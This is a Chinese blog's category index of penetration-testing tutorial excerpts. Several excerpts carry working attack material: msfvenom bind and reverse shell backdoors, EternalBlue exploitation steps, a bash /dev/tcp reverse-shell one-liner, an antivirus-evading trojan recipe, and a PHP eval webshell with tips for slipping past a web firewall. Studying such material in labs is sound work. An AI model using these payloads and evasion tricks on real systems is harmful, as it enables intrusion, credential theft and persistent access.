![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透
文章平均质量分 69
shy014
这个作者很懒,什么都没留下…
展开
-
渗透之读取Navicat数据库连接密码
4、将下图位置替换为导出文件的加密后的密码,然后成功解密得到数据库密码。1、导出Navicat中保存的数据库连接。3、打开导出的文件,找到加密后的密码。,然后将下述PHP代码复制进去。2、选择你想要获取的连接。原创 2022-09-14 17:23:47 · 832 阅读 · 0 评论 -
内网之横向移动之IPC
一,IPCIPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。二,ipc$与空连接,139,445端口,默认共享的关系1,ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口原创 2020-11-11 20:04:26 · 1887 阅读 · 0 评论 -
msf之正向shell的使用
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。1,生成正向shell后门文件msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe2,上传到目标机器上3.配置监听(很重要)4,运行目标机上的后门文件,获取shell1,2是正向sh.原创 2020-09-28 10:34:29 · 8789 阅读 · 5 评论 -
渗透之脏牛提权
1,确定系统版本Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)2,新建低权限的用户和切换到该用户3,下载脏牛exp下载地址:https://link.jianshu.com/?t=https%3A%2F%2Fgithub.com%2FFireFart%2Fdirtycow4,编译5,将编译好的exp上传到目标机上去./dirty新密码进行提权...原创 2020-09-14 23:07:34 · 1354 阅读 · 0 评论 -
渗透-linux系统信息收集
一、版本信息收集1,uname -a,22,hostnamectl3,cat /proc/version/proc目录包含虚拟文件,其中包含有关系统内存,CPU内核,已安装文件系统等的信息。有关正在运行的内核的信息存储在/proc/version虚拟文件中。4,lsb_release -alsb_release -a (适用于所有的linux,包括Redhat、SuSE、Debian等发行版,但是在debian下要安装lsb)5,cat /etc/issue显示的原创 2020-09-14 21:48:57 · 286 阅读 · 0 评论 -
搞死虚拟机-永恒之蓝和shift后门
扫描端口:发现开启了445端口可能存在永恒之蓝(ms17_010)漏洞nmap -sV -p- -A -v 192.168.206.129开启msfmsfconsole搜素 search ms17_010使用msf验证脚本,验证是否存在ms17_010use auxiliary/scanner/smb/smb_ms17_010show options配置验证脚本set RHOSTS 192.168.206.129运行run显示存在ms17_010漏洞.原创 2020-07-30 17:21:02 · 925 阅读 · 0 评论 -
如何完善反弹的shell
在渗透过程中,我发现用nc -e反弹的shell一点儿都不好用,我都不会用,特别麻烦,特别容易影响渗透的效率与感情,因此我百度了很多,终于找到了完善反弹shell的方法。python‐c"importpty;pty.spawn('/bin/bash')"使用python提供的pty模块,创建一个原生的终端Ctrl-C)仍然会关闭终止Netcat,完成标签或历史记录也依旧没有c...原创 2020-04-13 14:31:41 · 386 阅读 · 0 评论 -
详解反弹shell命令
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势:bash -i >& /dev/tcp/ip/port 0>&1bash -i本地打开一个bash>& 输出重定向,将标准输出和标准错误输出都重定向到远程。/dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...原创 2020-04-11 18:26:43 · 3498 阅读 · 0 评论 -
MSF免杀木马生成
启动msfconsole查看evasion模块选择合适的某块usewindows/windows_defender_exe配置payloadset payload windows/meterpteter/reverse_tcpset lhost 192.168.44.set lhost 4444...原创 2020-03-25 14:49:33 · 1469 阅读 · 0 评论 -
一次简单的域渗透
攻击机:kali 192.168.44.131军事区:window7 192.168.44.139 192.168.4.非军事区:window server 2003 192.168.4.kali:返回的连接可以使用background将当前连接切换到后台运行;3、切换到后台的会话可以使用session -i查看到,然后使用session -i id将后台的...原创 2020-03-19 16:50:10 · 444 阅读 · 0 评论 -
PHP一句话木马使用技巧
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。PHP一句话:<?php @eval($_POST['shy']);?>firefox浏览器:hackbar命令提示符:curl首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站,由于只是简单的一句话木马,因次一上车就收到了安全云的短信...原创 2020-01-20 12:43:21 · 18103 阅读 · 7 评论